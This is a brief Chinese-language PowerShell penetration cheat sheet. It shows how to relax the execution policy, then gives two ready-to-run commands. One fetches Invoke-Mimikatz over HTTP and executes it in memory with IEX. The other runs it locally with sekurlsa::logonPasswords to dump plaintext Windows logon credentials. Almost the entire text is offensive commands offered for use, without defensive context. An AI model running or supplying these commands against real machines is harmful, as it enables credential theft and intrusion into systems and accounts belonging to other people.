powershell渗透基础内容

powershell默认拒绝导入策略

  1. get-executionpolicy
  2. Set-ExecutionPolicy RemoteSigned(管理员运行)

powershell一句导出明文密码(在nishang文件夹里也有)

  • powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://127.0.0.1/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”
  • powershell Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ‘”privilege::debug” “sekurlsa::logonPasswords full”‘